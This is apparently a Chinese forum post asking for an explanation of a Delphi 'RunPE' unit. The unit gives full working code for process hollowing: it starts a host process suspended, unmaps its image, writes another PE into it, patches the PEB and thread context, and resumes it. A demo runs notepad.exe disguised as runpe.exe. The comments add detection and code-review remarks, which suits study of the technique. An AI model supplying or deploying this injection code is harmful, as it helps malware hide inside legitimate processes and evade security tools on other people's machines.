本人是菜鸟,希望能解答详细些呵。
{ uRunPE unit }
{ Loads a PE image that is already held in memory (bFile) into a freshly
  created, suspended instance of sVictim by replacing that process's mapped
  image -- the technique commonly called "RunPE" / process hollowing.
  Defensive note: the call sequence used below (CreateProcess with
  CREATE_SUSPENDED -> NtUnmapViewOfSection -> VirtualAllocEx/WriteProcessMemory
  at the PE's own ImageBase -> PEB patch -> SetThreadContext -> ResumeThread)
  is the canonical hollowing pattern that EDR/AV products key on, and after it
  runs the child's in-memory image no longer matches the file on disk that
  CreateProcess launched. The sections are also left PAGE_EXECUTE_READWRITE,
  which memory scanners flag on its own. }
unit uRunPE;

interface

uses Windows;

type
  { Dynamic byte buffer holding a raw PE file image (DOS header at index 0). }
  TByteArray = array of Byte;

{ Hollows a new suspended process of sVictim with the PE image in bFile.
  sVictim: path / command line of the host executable to create.
  bFile:   raw bytes of the PE file to load.
  Returns True only after the child's main thread has been resumed; False when
  the DOS or NT signature does not match or CreateProcess/GetThreadContext
  fail. Any exception raised inside is swallowed by the except block. }
function RunEXE(sVictim:string; bFile:TByteArray):Boolean;

{ Native API used to unmap the host process's original image. It is not
  exported by the Windows unit, so it is imported straight from ntdll.dll. }
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

{ Thin wrapper over CopyMemory. NOTE(review): this shadows System.Move inside
  the unit and takes (Destination, Source) pointers, whereas System.Move takes
  (Source, Dest) untyped parameters -- easy to misread when maintaining. }
procedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
  CopyMemory(Destination, Source, dLength);
end;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
  IDH: TImageDosHeader;       // DOS header copied from bFile[0]
  INH: TImageNtHeaders;       // NT headers copied from bFile[e_lfanew]
  ISH: TImageSectionHeader;   // section header being processed in the copy loop
  PI: TProcessInformation;    // handles/ids of the suspended child
  SI: TStartUpInfo;
  CONT: TContext;             // register context of the child's main thread
  ImageBase: Pointer;         // address the new image is placed at in the child
  Ret: DWORD;                 // bytes transferred by Read/WriteProcessMemory (never checked)
  i: integer;
  Addr: DWORD;                // value read from [EBX+8] in the child; later reused as VirtualProtectEx's old-protect out-param
  dOffset: DWORD;             // file offset of the first section header
begin
Result := FALSE;
try
  { 64 = SizeOf(IMAGE_DOS_HEADER); only the DOS signature is validated. }
  Move(@IDH, @bFile[0], 64);
  if IDH.e_magic = IMAGE_DOS_SIGNATURE then
  begin
    { 248 = SizeOf(IMAGE_NT_HEADERS32); only the "PE\0\0" signature is validated. }
    Move(@INH, @bFile[IDH._lfanew], 248);
    if INH.Signature = IMAGE_NT_SIGNATURE then
    begin
      FillChar(SI, SizeOf(TStartupInfo),#0);
      FillChar(PI, SizeOf(TProcessInformation),#0);
      SI.cb := SizeOf(TStartupInfo);
      { The host is started suspended so its main thread has not yet run the
        loader; everything below happens before the first user-mode instruction. }
      if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
      begin
        CONT.ContextFlags := CONTEXT_FULL;
        if GetThreadContext(PI.hThread, CONT) then
        begin
          { In a freshly created 32-bit process EBX holds the PEB pointer and
            PEB+8 is ImageBaseAddress (well-known layout; not verified by the code). }
          ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
          { Unmap the host's image; the return status is not examined. }
          NtUnmapViewOfSection(PI.hProcess, @Addr);
          { Reserve+commit the full image at the PE's preferred ImageBase; the
            result is not checked before being written to. }
          ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
          WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
          { Section table starts right after the NT headers; 40 = SizeOf(IMAGE_SECTION_HEADER). }
          dOffset := IDH._lfanew + 248;
          for i := 0 to INH.FileHeader.NumberOfSections - 1 do
          begin
            Move(@ISH, @bFile[dOffset + (i * 40)], 40);
            { Copy the raw section bytes to their virtual address, then mark the
              whole virtual extent RWX. Addr is only an out-param here. }
            WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
            VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
          end;
          { Point the child's PEB ImageBaseAddress at the new image. }
          WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
          { On 32-bit Windows the primary thread's initial EAX is the entry point
            the loader jumps to (well-known; not verified here). }
          CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
          { This asm block saves all general-purpose registers with pushad and
            restores them with popad, so the writes in between have no lasting
            effect and CONT is untouched; it is effectively dead code. }
          asm
            pushad
            mov eax,$00401000
            mov ebp,esp
            sub edx,$00010000
            popad
          end;
          { Apply the modified context and let the child run the injected image. }
          SetThreadContext(PI.hThread, CONT);
          ResumeThread(PI.hThread);
          Result := TRUE;
        end;
      end;
    end;
  end;
except
  { Best-effort cleanup, reached only on an exception: on the success path the
    child's process/thread handles stay open in this process. If the exception
    happens before FillChar(PI) ran (e.g. an out-of-range bFile index), PI is
    uninitialized and CloseHandle is called on whatever it contains. }
  CloseHandle(PI.hProcess);
  CloseHandle(PI.hThread);
end;
end;

end.
使用例子:
program RunPE;

uses
  Windows,
  uRunPE;

var
  bBuff: TByteArray;   // whole contents of the file handed to RunExe

{$R 1.res}   // linked resource file; its contents are not shown on this page

{ Reads the entire file at sPath into bFile.
  sPath: path of the file to read.
  bFile: receives the file bytes (resized to GetFileSize).
  Returns True when the file opened and ReadFile reported exactly GetFileSize
  bytes; False when CreateFile fails. NOTE(review): the ReadFile result and a
  GetFileSize failure (INVALID_FILE_SIZE) are not checked, and for an empty
  file bFile[0] indexes an empty dynamic array. }
function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
var
  hFile: THandle;
  dSize: DWORD;   // file size reported by GetFileSize
  dRead: DWORD;   // bytes actually read
begin
  Result := FALSE;
  hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
  if hFile <> INVALID_HANDLE_VALUE then
  begin
    dSize := GetFileSize(hFile, nil);
    SetLength(bFile, dSize);
    ReadFile(hFile, bFile[0], dSize, dRead, nil);
    CloseHandle(hFile);
    { Success only when the byte count matches the reported size. }
    if dRead = dSize then
      Result := TRUE;
  end;
end;

begin
  { Usage example: loads notepad.exe from the current directory and runs it
    inside a new suspended copy of this very program (ParamStr(0)). The
    process list will show runpe.exe while the code executing is notepad's --
    exactly the on-disk vs in-memory image mismatch that hollowing detections
    and memory scanners look for. RunExe's result is ignored. }
  if FileToBytes('notepad.exe', bBuff) then
    RunExe(ParamStr(0), bBuff);
end.
上面的例子是把记事本程序在runpe.exe中执行。